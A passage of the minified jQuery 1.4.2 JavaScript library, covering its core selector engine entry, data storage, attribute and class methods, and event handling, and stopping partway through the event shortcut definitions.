(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o],o,e(a[o],b)):d,j);return a}return i?
e(a[0],b):w}function J(){return(new Date).getTime()}function Y(){return false}function Z(){return true}function na(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function oa(a){var b,d=[],f=[],e=arguments,j,i,o,k,n,r;i=c.data(this,"events");if(!(a.liveFired===this||!i||!i.live||a.button&&a.type==="click")){a.liveFired=this;var u=i.live.slice(0);for(k=0;k<u.length;k++){i=u[k];i.origType.replace(O,"")===a.type?f.push(i.selector):u.splice(k--,1)}j=c(a.target).closest(f,a.currentTarget);n=0;for(r=
j.length;n<r;n++)for(k=0;k<u.length;k++){i=u[k];if(j[n].selector===i.selector){o=j[n].elem;f=null;if(i.preType==="mouseenter"||i.preType==="mouseleave")f=c(a.relatedTarget).closest(i.selector)[0];if(!f||f!==o)d.push({elem:o,handleObj:i})}}n=0;for(r=d.length;n<r;n++){j=d[n];a.currentTarget=j.elem;a.data=j.handleObj.data;a.handleObj=j.handleObj;if(j.handleObj.origHandler.apply(j.elem,e)===false){b=false;break}}return b}}function pa(a,b){return"live."+(a&&a!=="*"?a+".":"")+b.replace(/\./g,"`").replace(/ /g,
"&")}function qa(a){return!a||!a.parentNode||a.parentNode.nodeType===11}function ra(a,b){var d=0;b.each(function(){if(this.nodeName===(a[d]&&a[d].nodeName)){var f=c.data(a[d++]),e=c.data(this,f);if(f=f&&f.events){delete e.handle;e.events={};for(var j in f)for(var i in f[j])c.event.add(this,j,f[j][i],f[j][i].data)}}})}function sa(a,b,d){var f,e,j;b=b&&b[0]?b[0].ownerDocument||b[0]:s;if(a.length===1&&typeof a[0]==="string"&&a[0].length<512&&b===s&&!ta.test(a[0])&&(c.support.checkClone||!ua.test(a[0]))){e=
true;if(j=c.fragments[a[0]])if(j!==1)f=j}if(!f){f=b.createDocumentFragment();c.clean(a,b,f,d)}if(e)c.fragments[a[0]]=j?f:1;return{fragment:f,cacheable:e}}function K(a,b){var d={};c.each(va.concat.apply([],va.slice(0,b)),function(){d[this]=a});return d}function wa(a){return"scrollTo"in a&&a.document?a:a.nodeType===9?a.defaultView||a.parentWindow:false}var c=function(a,b){return new c.fn.init(a,b)},Ra=A.jQuery,Sa=A.$,s=A.document,T,Ta=/^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/,Ua=/^.[^:#\[\.,]*$/,Va=/\S/,
Wa=/^(\s|\u00A0)+|(\s|\u00A0)+$/g,Xa=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,P=navigator.userAgent,xa=false,Q=[],L,$=Object.prototype.toString,aa=Object.prototype.hasOwnProperty,ba=Array.prototype.push,R=Array.prototype.slice,ya=Array.prototype.indexOf;c.fn=c.prototype={init:function(a,b){var d,f;if(!a)return this;if(a.nodeType){this.context=this[0]=a;this.length=1;return this}if(a==="body"&&!b){this.context=s;this[0]=s.body;this.selector="body";this.length=1;return this}if(typeof a==="string")if((d=Ta.exec(a))&&
(d[1]||!b))if(d[1]){f=b?b.ownerDocument||b:s;if(a=Xa.exec(a))if(c.isPlainObject(b)){a=[s.createElement(a[1])];c.fn.attr.call(a,b,true)}else a=[f.createElement(a[1])];else{a=sa([d[1]],[f]);a=(a.cacheable?a.fragment.cloneNode(true):a.fragment).childNodes}return c.merge(this,a)}else{if(b=s.getElementById(d[2])){if(b.id!==d[2])return T.find(a);this.length=1;this[0]=b}this.context=s;this.selector=a;return this}else if(!b&&/^\w+$/.test(a)){this.selector=a;this.context=s;a=s.getElementsByTagName(a);return c.merge(this,
a)}else return!b||b.jquery?(b||T).find(a):c(b).find(a);else if(c.isFunction(a))return T.ready(a);if(a.selector!==w){this.selector=a.selector;this.context=a.context}return c.makeArray(a,this)},selector:"",jquery:"1.4.2",length:0,size:function(){return this.length},toArray:function(){return R.call(this,0)},get:function(a){return a==null?this.toArray():a<0?this.slice(a)[0]:this[a]},pushStack:function(a,b,d){var f=c();c.isArray(a)?ba.apply(f,a):c.merge(f,a);f.prevObject=this;f.context=this.context;if(b===
"find")f.selector=this.selector+(this.selector?" ":"")+d;else if(b)f.selector=this.selector+"."+b+"("+d+")";return f},each:function(a,b){return c.each(this,a,b)},ready:function(a){c.bindReady();if(c.isReady)a.call(s,c);else Q&&Q.push(a);return this},eq:function(a){return a===-1?this.slice(a):this.slice(a,+a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(R.apply(this,arguments),"slice",R.call(arguments).join(","))},map:function(a){return this.pushStack(c.map(this,
function(b,d){return a.call(b,d,b)}))},end:function(){return this.prevObject||c(null)},push:ba,sort:[].sort,splice:[].splice};c.fn.init.prototype=c.fn;c.extend=c.fn.extend=function(){var a=arguments[0]||{},b=1,d=arguments.length,f=false,e,j,i,o;if(typeof a==="boolean"){f=a;a=arguments[1]||{};b=2}if(typeof a!=="object"&&!c.isFunction(a))a={};if(d===b){a=this;--b}for(;b<d;b++)if((e=arguments[b])!=null)for(j in e){i=a[j];o=e[j];if(a!==o)if(f&&o&&(c.isPlainObject(o)||c.isArray(o))){i=i&&(c.isPlainObject(i)||
c.isArray(i))?i:c.isArray(o)?[]:{};a[j]=c.extend(f,i,o)}else if(o!==w)a[j]=o}return a};c.extend({noConflict:function(a){A.$=Sa;if(a)A.jQuery=Ra;return c},isReady:false,ready:function(){if(!c.isReady){if(!s.body)return setTimeout(c.ready,13);c.isReady=true;if(Q){for(var a,b=0;a=Q[b++];)a.call(s,c);Q=null}c.fn.triggerHandler&&c(s).triggerHandler("ready")}},bindReady:function(){if(!xa){xa=true;if(s.readyState==="complete")return c.ready();if(s.addEventListener){s.addEventListener("DOMContentLoaded",
L,false);A.addEventListener("load",c.ready,false)}else if(s.attachEvent){s.attachEvent("onreadystatechange",L);A.attachEvent("onload",c.ready);var a=false;try{a=A.frameElement==null}catch(b){}s.documentElement.doScroll&&a&&ma()}}},isFunction:function(a){return $.call(a)==="[object Function]"},isArray:function(a){return $.call(a)==="[object Array]"},isPlainObject:function(a){if(!a||$.call(a)!=="[object Object]"||a.nodeType||a.setInterval)return false;if(a.constructor&&!aa.call(a,"constructor")&&!aa.call(a.constructor.prototype,
"isPrototypeOf"))return false;var b;for(b in a);return b===w||aa.call(a,b)},isEmptyObject:function(a){for(var b in a)return false;return true},error:function(a){throw a;},parseJSON:function(a){if(typeof a!=="string"||!a)return null;a=c.trim(a);if(/^[\],:{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,"]").replace(/(?:^|:|,)(?:\s*\[)+/g,"")))return A.JSON&&A.JSON.parse?A.JSON.parse(a):(new Function("return "+
a))();else c.error("Invalid JSON: "+a)},noop:function(){},globalEval:function(a){if(a&&Va.test(a)){var b=s.getElementsByTagName("head")[0]||s.documentElement,d=s.createElement("script");d.type="text/javascript";if(c.support.scriptEval)d.appendChild(s.createTextNode(a));else d.text=a;b.insertBefore(d,b.firstChild);b.removeChild(d)}},nodeName:function(a,b){return a.nodeName&&a.nodeName.toUpperCase()===b.toUpperCase()},each:function(a,b,d){var f,e=0,j=a.length,i=j===w||c.isFunction(a);if(d)if(i)for(f in a){if(b.apply(a[f],
d)===false)break}else for(;e<j;){if(b.apply(a[e++],d)===false)break}else if(i)for(f in a){if(b.call(a[f],f,a[f])===false)break}else for(d=a[0];e<j&&b.call(d,e,d)!==false;d=a[++e]);return a},trim:function(a){return(a||"").replace(Wa,"")},makeArray:function(a,b){b=b||[];if(a!=null)a.length==null||typeof a==="string"||c.isFunction(a)||typeof a!=="function"&&a.setInterval?ba.call(b,a):c.merge(b,a);return b},inArray:function(a,b){if(b.indexOf)return b.indexOf(a);for(var d=0,f=b.length;d<f;d++)if(b[d]===
a)return d;return-1},merge:function(a,b){var d=a.length,f=0;if(typeof b.length==="number")for(var e=b.length;f<e;f++)a[d++]=b[f];else for(;b[f]!==w;)a[d++]=b[f++];a.length=d;return a},grep:function(a,b,d){for(var f=[],e=0,j=a.length;e<j;e++)!d!==!b(a[e],e)&&f.push(a[e]);return f},map:function(a,b,d){for(var f=[],e,j=0,i=a.length;j<i;j++){e=b(a[j],j,d);if(e!=null)f[f.length]=e}return f.concat.apply([],f)},guid:1,proxy:function(a,b,d){if(arguments.length===2)if(typeof b==="string"){d=a;a=d[b];b=w}else if(b&&
!c.isFunction(b)){d=b;b=w}if(!b&&a)b=function(){return a.apply(d||this,arguments)};if(a)b.guid=a.guid=a.guid||b.guid||c.guid++;return b},uaMatch:function(a){a=a.toLowerCase();a=/(webkit)[ \/]([\w.]+)/.exec(a)||/(opera)(?:.*version)?[ \/]([\w.]+)/.exec(a)||/(msie) ([\w.]+)/.exec(a)||!/compatible/.test(a)&&/(mozilla)(?:.*? rv:([\w.]+))?/.exec(a)||[];return{browser:a[1]||"",version:a[2]||"0"}},browser:{}});P=c.uaMatch(P);if(P.browser){c.browser[P.browser]=true;c.browser.version=P.version}if(c.browser.webkit)c.browser.safari=
true;if(ya)c.inArray=function(a,b){return ya.call(b,a)};T=c(s);if(s.addEventListener)L=function(){s.removeEventListener("DOMContentLoaded",L,false);c.ready()};else if(s.attachEvent)L=function(){if(s.readyState==="complete"){s.detachEvent("onreadystatechange",L);c.ready()}};(function(){c.support={};var a=s.documentElement,b=s.createElement("script"),d=s.createElement("div"),f="script"+J();d.style.display="none";d.innerHTML=" <link/><table></table><a href='/a' style='color:red;float:left;opacity:.55;'>a</a><input type='checkbox'/>";
var e=d.getElementsByTagName("*"),j=d.getElementsByTagName("a")[0];if(!(!e||!e.length||!j)){c.support={leadingWhitespace:d.firstChild.nodeType===3,tbody:!d.getElementsByTagName("tbody").length,htmlSerialize:!!d.getElementsByTagName("link").length,style:/red/.test(j.getAttribute("style")),hrefNormalized:j.getAttribute("href")==="/a",opacity:/^0.55$/.test(j.style.opacity),cssFloat:!!j.style.cssFloat,checkOn:d.getElementsByTagName("input")[0].value==="on",optSelected:s.createElement("select").appendChild(s.createElement("option")).selected,
parentNode:d.removeChild(d.appendChild(s.createElement("div"))).parentNode===null,deleteExpando:true,checkClone:false,scriptEval:false,noCloneEvent:true,boxModel:null};b.type="text/javascript";try{b.appendChild(s.createTextNode("window."+f+"=1;"))}catch(i){}a.insertBefore(b,a.firstChild);if(A[f]){c.support.scriptEval=true;delete A[f]}try{delete b.test}catch(o){c.support.deleteExpando=false}a.removeChild(b);if(d.attachEvent&&d.fireEvent){d.attachEvent("onclick",function k(){c.support.noCloneEvent=
false;d.detachEvent("onclick",k)});d.cloneNode(true).fireEvent("onclick")}d=s.createElement("div");d.innerHTML="<input type='radio' name='radiotest' checked='checked'/>";a=s.createDocumentFragment();a.appendChild(d.firstChild);c.support.checkClone=a.cloneNode(true).cloneNode(true).lastChild.checked;c(function(){var k=s.createElement("div");k.style.width=k.style.paddingLeft="1px";s.body.appendChild(k);c.boxModel=c.support.boxModel=k.offsetWidth===2;s.body.removeChild(k).style.display="none"});a=function(k){var n=
s.createElement("div");k="on"+k;var r=k in n;if(!r){n.setAttribute(k,"return;");r=typeof n[k]==="function"}return r};c.support.submitBubbles=a("submit");c.support.changeBubbles=a("change");a=b=d=e=j=null}})();c.props={"for":"htmlFor","class":"className",readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",colspan:"colSpan",tabindex:"tabIndex",usemap:"useMap",frameborder:"frameBorder"};var G="jQuery"+J(),Ya=0,za={};c.extend({cache:{},expando:G,noData:{embed:true,object:true,
applet:true},data:function(a,b,d){if(!(a.nodeName&&c.noData[a.nodeName.toLowerCase()])){a=a==A?za:a;var f=a[G],e=c.cache;if(!f&&typeof b==="string"&&d===w)return null;f||(f=++Ya);if(typeof b==="object"){a[G]=f;e[f]=c.extend(true,{},b)}else if(!e[f]){a[G]=f;e[f]={}}a=e[f];if(d!==w)a[b]=d;return typeof b==="string"?a[b]:a}},removeData:function(a,b){if(!(a.nodeName&&c.noData[a.nodeName.toLowerCase()])){a=a==A?za:a;var d=a[G],f=c.cache,e=f[d];if(b){if(e){delete e[b];c.isEmptyObject(e)&&c.removeData(a)}}else{if(c.support.deleteExpando)delete a[c.expando];
else a.removeAttribute&&a.removeAttribute(c.expando);delete f[d]}}}});c.fn.extend({data:function(a,b){if(typeof a==="undefined"&&this.length)return c.data(this[0]);else if(typeof a==="object")return this.each(function(){c.data(this,a)});var d=a.split(".");d[1]=d[1]?"."+d[1]:"";if(b===w){var f=this.triggerHandler("getData"+d[1]+"!",[d[0]]);if(f===w&&this.length)f=c.data(this[0],a);return f===w&&d[1]?this.data(d[0]):f}else return this.trigger("setData"+d[1]+"!",[d[0],b]).each(function(){c.data(this,
a,b)})},removeData:function(a){return this.each(function(){c.removeData(this,a)})}});c.extend({queue:function(a,b,d){if(a){b=(b||"fx")+"queue";var f=c.data(a,b);if(!d)return f||[];if(!f||c.isArray(d))f=c.data(a,b,c.makeArray(d));else f.push(d);return f}},dequeue:function(a,b){b=b||"fx";var d=c.queue(a,b),f=d.shift();if(f==="inprogress")f=d.shift();if(f){b==="fx"&&d.unshift("inprogress");f.call(a,function(){c.dequeue(a,b)})}}});c.fn.extend({queue:function(a,b){if(typeof a!=="string"){b=a;a="fx"}if(b===
w)return c.queue(this[0],a);return this.each(function(){var d=c.queue(this,a,b);a==="fx"&&d[0]!=="inprogress"&&c.dequeue(this,a)})},dequeue:function(a){return this.each(function(){c.dequeue(this,a)})},delay:function(a,b){a=c.fx?c.fx.speeds[a]||a:a;b=b||"fx";return this.queue(b,function(){var d=this;setTimeout(function(){c.dequeue(d,b)},a)})},clearQueue:function(a){return this.queue(a||"fx",[])}});var Aa=/[\n\t]/g,ca=/\s+/,Za=/\r/g,$a=/href|src|style/,ab=/(button|input)/i,bb=/(button|input|object|select|textarea)/i,
cb=/^(a|area)$/i,Ba=/radio|checkbox/;c.fn.extend({attr:function(a,b){return X(this,a,b,true,c.attr)},removeAttr:function(a){return this.each(function(){c.attr(this,a,"");this.nodeType===1&&this.removeAttribute(a)})},addClass:function(a){if(c.isFunction(a))return this.each(function(n){var r=c(this);r.addClass(a.call(this,n,r.attr("class")))});if(a&&typeof a==="string")for(var b=(a||"").split(ca),d=0,f=this.length;d<f;d++){var e=this[d];if(e.nodeType===1)if(e.className){for(var j=" "+e.className+" ",
i=e.className,o=0,k=b.length;o<k;o++)if(j.indexOf(" "+b[o]+" ")<0)i+=" "+b[o];e.className=c.trim(i)}else e.className=a}return this},removeClass:function(a){if(c.isFunction(a))return this.each(function(k){var n=c(this);n.removeClass(a.call(this,k,n.attr("class")))});if(a&&typeof a==="string"||a===w)for(var b=(a||"").split(ca),d=0,f=this.length;d<f;d++){var e=this[d];if(e.nodeType===1&&e.className)if(a){for(var j=(" "+e.className+" ").replace(Aa," "),i=0,o=b.length;i<o;i++)j=j.replace(" "+b[i]+" ",
" ");e.className=c.trim(j)}else e.className=""}return this},toggleClass:function(a,b){var d=typeof a,f=typeof b==="boolean";if(c.isFunction(a))return this.each(function(e){var j=c(this);j.toggleClass(a.call(this,e,j.attr("class"),b),b)});return this.each(function(){if(d==="string")for(var e,j=0,i=c(this),o=b,k=a.split(ca);e=k[j++];){o=f?o:!i.hasClass(e);i[o?"addClass":"removeClass"](e)}else if(d==="undefined"||d==="boolean"){this.className&&c.data(this,"__className__",this.className);this.className=
this.className||a===false?"":c.data(this,"__className__")||""}})},hasClass:function(a){a=" "+a+" ";for(var b=0,d=this.length;b<d;b++)if((" "+this[b].className+" ").replace(Aa," ").indexOf(a)>-1)return true;return false},val:function(a){if(a===w){var b=this[0];if(b){if(c.nodeName(b,"option"))return(b.attributes.value||{}).specified?b.value:b.text;if(c.nodeName(b,"select")){var d=b.selectedIndex,f=[],e=b.options;b=b.type==="select-one";if(d<0)return null;var j=b?d:0;for(d=b?d+1:e.length;j<d;j++){var i=
e[j];if(i.selected){a=c(i).val();if(b)return a;f.push(a)}}return f}if(Ba.test(b.type)&&!c.support.checkOn)return b.getAttribute("value")===null?"on":b.value;return(b.value||"").replace(Za,"")}return w}var o=c.isFunction(a);return this.each(function(k){var n=c(this),r=a;if(this.nodeType===1){if(o)r=a.call(this,k,n.val());if(typeof r==="number")r+="";if(c.isArray(r)&&Ba.test(this.type))this.checked=c.inArray(n.val(),r)>=0;else if(c.nodeName(this,"select")){var u=c.makeArray(r);c("option",this).each(function(){this.selected=
c.inArray(c(this).val(),u)>=0});if(!u.length)this.selectedIndex=-1}else this.value=r}})}});c.extend({attrFn:{val:true,css:true,html:true,text:true,data:true,width:true,height:true,offset:true},attr:function(a,b,d,f){if(!a||a.nodeType===3||a.nodeType===8)return w;if(f&&b in c.attrFn)return c(a)[b](d);f=a.nodeType!==1||!c.isXMLDoc(a);var e=d!==w;b=f&&c.props[b]||b;if(a.nodeType===1){var j=$a.test(b);if(b in a&&f&&!j){if(e){b==="type"&&ab.test(a.nodeName)&&a.parentNode&&c.error("type property can't be changed");
a[b]=d}if(c.nodeName(a,"form")&&a.getAttributeNode(b))return a.getAttributeNode(b).nodeValue;if(b==="tabIndex")return(b=a.getAttributeNode("tabIndex"))&&b.specified?b.value:bb.test(a.nodeName)||cb.test(a.nodeName)&&a.href?0:w;return a[b]}if(!c.support.style&&f&&b==="style"){if(e)a.style.cssText=""+d;return a.style.cssText}e&&a.setAttribute(b,""+d);a=!c.support.hrefNormalized&&f&&j?a.getAttribute(b,2):a.getAttribute(b);return a===null?w:a}return c.style(a,b,d)}});var O=/\.(.*)$/,db=function(a){return a.replace(/[^\w\s\.\|`]/g,
function(b){return"\\"+b})};c.event={add:function(a,b,d,f){if(!(a.nodeType===3||a.nodeType===8)){if(a.setInterval&&a!==A&&!a.frameElement)a=A;var e,j;if(d.handler){e=d;d=e.handler}if(!d.guid)d.guid=c.guid++;if(j=c.data(a)){var i=j.events=j.events||{},o=j.handle;if(!o)j.handle=o=function(){return typeof c!=="undefined"&&!c.event.triggered?c.event.handle.apply(o.elem,arguments):w};o.elem=a;b=b.split(" ");for(var k,n=0,r;k=b[n++];){j=e?c.extend({},e):{handler:d,data:f};if(k.indexOf(".")>-1){r=k.split(".");
k=r.shift();j.namespace=r.slice(0).sort().join(".")}else{r=[];j.namespace=""}j.type=k;j.guid=d.guid;var u=i[k],z=c.event.special[k]||{};if(!u){u=i[k]=[];if(!z.setup||z.setup.call(a,f,r,o)===false)if(a.addEventListener)a.addEventListener(k,o,false);else a.attachEvent&&a.attachEvent("on"+k,o)}if(z.add){z.add.call(a,j);if(!j.handler.guid)j.handler.guid=d.guid}u.push(j);c.event.global[k]=true}a=null}}},global:{},remove:function(a,b,d,f){if(!(a.nodeType===3||a.nodeType===8)){var e,j=0,i,o,k,n,r,u,z=c.data(a),
C=z&&z.events;if(z&&C){if(b&&b.type){d=b.handler;b=b.type}if(!b||typeof b==="string"&&b.charAt(0)==="."){b=b||"";for(e in C)c.event.remove(a,e+b)}else{for(b=b.split(" ");e=b[j++];){n=e;i=e.indexOf(".")<0;o=[];if(!i){o=e.split(".");e=o.shift();k=new RegExp("(^|\\.)"+c.map(o.slice(0).sort(),db).join("\\.(?:.*\\.)?")+"(\\.|$)")}if(r=C[e])if(d){n=c.event.special[e]||{};for(B=f||0;B<r.length;B++){u=r[B];if(d.guid===u.guid){if(i||k.test(u.namespace)){f==null&&r.splice(B--,1);n.remove&&n.remove.call(a,u)}if(f!=
null)break}}if(r.length===0||f!=null&&r.length===1){if(!n.teardown||n.teardown.call(a,o)===false)Ca(a,e,z.handle);delete C[e]}}else for(var B=0;B<r.length;B++){u=r[B];if(i||k.test(u.namespace)){c.event.remove(a,n,u.handler,B);r.splice(B--,1)}}}if(c.isEmptyObject(C)){if(b=z.handle)b.elem=null;delete z.events;delete z.handle;c.isEmptyObject(z)&&c.removeData(a)}}}}},trigger:function(a,b,d,f){var e=a.type||a;if(!f){a=typeof a==="object"?a[G]?a:c.extend(c.Event(e),a):c.Event(e);if(e.indexOf("!")>=0){a.type=
e=e.slice(0,-1);a.exclusive=true}if(!d){a.stopPropagation();c.event.global[e]&&c.each(c.cache,function(){this.events&&this.events[e]&&c.event.trigger(a,b,this.handle.elem)})}if(!d||d.nodeType===3||d.nodeType===8)return w;a.result=w;a.target=d;b=c.makeArray(b);b.unshift(a)}a.currentTarget=d;(f=c.data(d,"handle"))&&f.apply(d,b);f=d.parentNode||d.ownerDocument;try{if(!(d&&d.nodeName&&c.noData[d.nodeName.toLowerCase()]))if(d["on"+e]&&d["on"+e].apply(d,b)===false)a.result=false}catch(j){}if(!a.isPropagationStopped()&&
f)c.event.trigger(a,b,f,true);else if(!a.isDefaultPrevented()){f=a.target;var i,o=c.nodeName(f,"a")&&e==="click",k=c.event.special[e]||{};if((!k._default||k._default.call(d,a)===false)&&!o&&!(f&&f.nodeName&&c.noData[f.nodeName.toLowerCase()])){try{if(f[e]){if(i=f["on"+e])f["on"+e]=null;c.event.triggered=true;f[e]()}}catch(n){}if(i)f["on"+e]=i;c.event.triggered=false}}},handle:function(a){var b,d,f,e;a=arguments[0]=c.event.fix(a||A.event);a.currentTarget=this;b=a.type.indexOf(".")<0&&!a.exclusive;
if(!b){d=a.type.split(".");a.type=d.shift();f=new RegExp("(^|\\.)"+d.slice(0).sort().join("\\.(?:.*\\.)?")+"(\\.|$)")}e=c.data(this,"events");d=e[a.type];if(e&&d){d=d.slice(0);e=0;for(var j=d.length;e<j;e++){var i=d[e];if(b||f.test(i.namespace)){a.handler=i.handler;a.data=i.data;a.handleObj=i;i=i.handler.apply(this,arguments);if(i!==w){a.result=i;if(i===false){a.preventDefault();a.stopPropagation()}}if(a.isImmediatePropagationStopped())break}}}return a.result},props:"altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode layerX layerY metaKey newValue offsetX offsetY originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target toElement view wheelDelta which".split(" "),
fix:function(a){if(a[G])return a;var b=a;a=c.Event(b);for(var d=this.props.length,f;d;){f=this.props[--d];a[f]=b[f]}if(!a.target)a.target=a.srcElement||s;if(a.target.nodeType===3)a.target=a.target.parentNode;if(!a.relatedTarget&&a.fromElement)a.relatedTarget=a.fromElement===a.target?a.toElement:a.fromElement;if(a.pageX==null&&a.clientX!=null){b=s.documentElement;d=s.body;a.pageX=a.clientX+(b&&b.scrollLeft||d&&d.scrollLeft||0)-(b&&b.clientLeft||d&&d.clientLeft||0);a.pageY=a.clientY+(b&&b.scrollTop||
d&&d.scrollTop||0)-(b&&b.clientTop||d&&d.clientTop||0)}if(!a.which&&(a.charCode||a.charCode===0?a.charCode:a.keyCode))a.which=a.charCode||a.keyCode;if(!a.metaKey&&a.ctrlKey)a.metaKey=a.ctrlKey;if(!a.which&&a.button!==w)a.which=a.button&1?1:a.button&2?3:a.button&4?2:0;return a},guid:1E8,proxy:c.proxy,special:{ready:{setup:c.bindReady,teardown:c.noop},live:{add:function(a){c.event.add(this,a.origType,c.extend({},a,{handler:oa}))},remove:function(a){var b=true,d=a.origType.replace(O,"");c.each(c.data(this,
"events").live||[],function(){if(d===this.origType.replace(O,""))return b=false});b&&c.event.remove(this,a.origType,oa)}},beforeunload:{setup:function(a,b,d){if(this.setInterval)this.onbeforeunload=d;return false},teardown:function(a,b){if(this.onbeforeunload===b)this.onbeforeunload=null}}}};var Ca=s.removeEventListener?function(a,b,d){a.removeEventListener(b,d,false)}:function(a,b,d){a.detachEvent("on"+b,d)};c.Event=function(a){if(!this.preventDefault)return new c.Event(a);if(a&&a.type){this.originalEvent=
a;this.type=a.type}else this.type=a;this.timeStamp=J();this[G]=true};c.Event.prototype={preventDefault:function(){this.isDefaultPrevented=Z;var a=this.originalEvent;if(a){a.preventDefault&&a.preventDefault();a.returnValue=false}},stopPropagation:function(){this.isPropagationStopped=Z;var a=this.originalEvent;if(a){a.stopPropagation&&a.stopPropagation();a.cancelBubble=true}},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=Z;this.stopPropagation()},isDefaultPrevented:Y,isPropagationStopped:Y,
isImmediatePropagationStopped:Y};var Da=function(a){var b=a.relatedTarget;try{for(;b&&b!==this;)b=b.parentNode;if(b!==this){a.type=a.data;c.event.handle.apply(this,arguments)}}catch(d){}},Ea=function(a){a.type=a.data;c.event.handle.apply(this,arguments)};c.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(a,b){c.event.special[a]={setup:function(d){c.event.add(this,b,d&&d.selector?Ea:Da,a)},teardown:function(d){c.event.remove(this,b,d&&d.selector?Ea:Da)}}});if(!c.support.submitBubbles)c.event.special.submit=
{setup:function(){if(this.nodeName.toLowerCase()!=="form"){c.event.add(this,"click.specialSubmit",function(a){var b=a.target,d=b.type;if((d==="submit"||d==="image")&&c(b).closest("form").length)return na("submit",this,arguments)});c.event.add(this,"keypress.specialSubmit",function(a){var b=a.target,d=b.type;if((d==="text"||d==="password")&&c(b).closest("form").length&&a.keyCode===13)return na("submit",this,arguments)})}else return false},teardown:function(){c.event.remove(this,".specialSubmit")}};
if(!c.support.changeBubbles){var da=/textarea|input|select/i,ea,Fa=function(a){var b=a.type,d=a.value;if(b==="radio"||b==="checkbox")d=a.checked;else if(b==="select-multiple")d=a.selectedIndex>-1?c.map(a.options,function(f){return f.selected}).join("-"):"";else if(a.nodeName.toLowerCase()==="select")d=a.selectedIndex;return d},fa=function(a,b){var d=a.target,f,e;if(!(!da.test(d.nodeName)||d.readOnly)){f=c.data(d,"_change_data");e=Fa(d);if(a.type!=="focusout"||d.type!=="radio")c.data(d,"_change_data",
e);if(!(f===w||e===f))if(f!=null||e){a.type="change";return c.event.trigger(a,b,d)}}};c.event.special.change={filters:{focusout:fa,click:function(a){var b=a.target,d=b.type;if(d==="radio"||d==="checkbox"||b.nodeName.toLowerCase()==="select")return fa.call(this,a)},keydown:function(a){var b=a.target,d=b.type;if(a.keyCode===13&&b.nodeName.toLowerCase()!=="textarea"||a.keyCode===32&&(d==="checkbox"||d==="radio")||d==="select-multiple")return fa.call(this,a)},beforeactivate:function(a){a=a.target;c.data(a,
"_change_data",Fa(a))}},setup:function(){if(this.type==="file")return false;for(var a in ea)c.event.add(this,a+".specialChange",ea[a]);return da.test(this.nodeName)},teardown:function(){c.event.remove(this,".specialChange");return da.test(this.nodeName)}};ea=c.event.special.change.filters}s.addEventListener&&c.each({focus:"focusin",blur:"focusout"},function(a,b){function d(f){f=c.event.fix(f);f.type=b;return c.event.handle.call(this,f)}c.event.special[b]={setup:function(){this.addEventListener(a,
d,true)},teardown:function(){this.removeEventListener(a,d,true)}}});c.each(["bind","one"],function(a,b){c.fn[b]=function(d,f,e){if(typeof d==="object"){for(var j in d)this[b](j,f,d[j],e);return this}if(c.isFunction(f)){e=f;f=w}var i=b==="one"?c.proxy(e,function(k){c(this).unbind(k,i);return e.apply(this,arguments)}):e;if(d==="unload"&&b!=="one")this.one(d,f,e);else{j=0;for(var o=this.length;j<o;j++)c.event.add(this[j],d,i,f)}return this}});c.fn.extend({unbind:function(a,b){if(typeof a==="object"&&
!a.preventDefault)for(var d in a)this.unbind(d,a[d]);else{d=0;for(var f=this.length;d<f;d++)c.event.remove(this[d],a,b)}return this},delegate:function(a,b,d,f){return this.live(b,d,f,a)},undelegate:function(a,b,d){return arguments.length===0?this.unbind("live"):this.die(b,null,d,a)},trigger:function(a,b){return this.each(function(){c.event.trigger(a,b,this)})},triggerHandler:function(a,b){if(this[0]){a=c.Event(a);a.preventDefault();a.stopPropagation();c.event.trigger(a,b,this[0]);return a.result}},
toggle:function(a){for(var b=arguments,d=1;d<b.length;)c.proxy(a,b[d++]);return this.click(c.proxy(a,function(f){var e=(c.data(this,"lastToggle"+a.guid)||0)%d;c.data(this,"lastToggle"+a.guid,e+1);f.preventDefault();return b[e].apply(this,arguments)||false}))},hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)}});var Ga={focus:"focusin",blur:"focusout",mouseenter:"mouseover",mouseleave:"mouseout"};c.each(["live","die"],function(a,b){c.fn[b]=function(d,f,e,j){var i,o=0,k,n,r=j||this.selector,
u=j?this:c(this.context);if(c.isFunction(f)){e=f;f=w}for(d=(d||"").split(" ");(i=d[o++])!=null;){j=O.exec(i);k="";if(j){k=j[0];i=i.replace(O,"")}if(i==="hover")d.push("mouseenter"+k,"mouseleave"+k);else{n=i;if(i==="focus"||i==="blur"){d.push(Ga[i]+k);i+=k}else i=(Ga[i]||i)+k;b==="live"?u.each(function(){c.event.add(this,pa(i,r),{data:f,selector:r,handler:e,origType:i,origHandler:e,preType:n})}):u.unbind(pa(i,r),e)}}return this}});c.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error".split(" "),
